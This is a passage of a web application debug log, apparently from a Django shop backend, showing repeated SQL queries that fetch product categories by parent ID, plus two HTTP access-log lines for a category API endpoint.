"shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:02:12,780 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:02:12,783 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:02:12,787 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:02:12,792 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:02:12,796 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:02:12,799 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:02:12,803 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:02:12,806 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:02:12,810 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:02:12,816 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:02:12,820 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:02:12,824 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:02:12,826 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:02:12,829 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:02:12,832 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:02:12,835 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:02:12,837 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:02:12,839 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:02:12,841 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:02:12,845 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:02:12,847 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 10:02:12,849 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 10:02:12,852 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 10:02:12,854 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 10:02:12,856 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 10:02:12,859 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 10:02:12,861 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 10:02:12,863 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 10:02:12,866 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 10:02:12,868 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 10:02:12] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 10:05:03] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 10:09:27,394 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 10:09:27,402 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 10:09:27,407 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 10:09:27,409 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 10:09:27,413 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 10:09:27,416 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 10:09:27,419 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 10:09:27,422 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 10:09:27,424 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 10:09:27,428 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 10:09:27,431 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 10:09:27,434 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 10:09:27,437 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 10:09:27,440 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 10:09:27,444 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 10:09:27,447 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 10:09:27,451 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 10:09:27,455 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 10:09:27,459 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 10:09:27,465 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 10:09:27,469 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 10:09:27,473 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 10:09:27,477 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 10:09:27,481 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 10:09:27,485 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 10:09:27,491 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 10:09:27,495 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 10:09:27,498 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 10:09:27,502 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 10:09:27,506 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 10:09:27,512 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 10:09:27,516 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 10:09:27,519 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 10:09:27,523 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 10:09:27,527 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 10:09:27,533 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 10:09:27,537 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 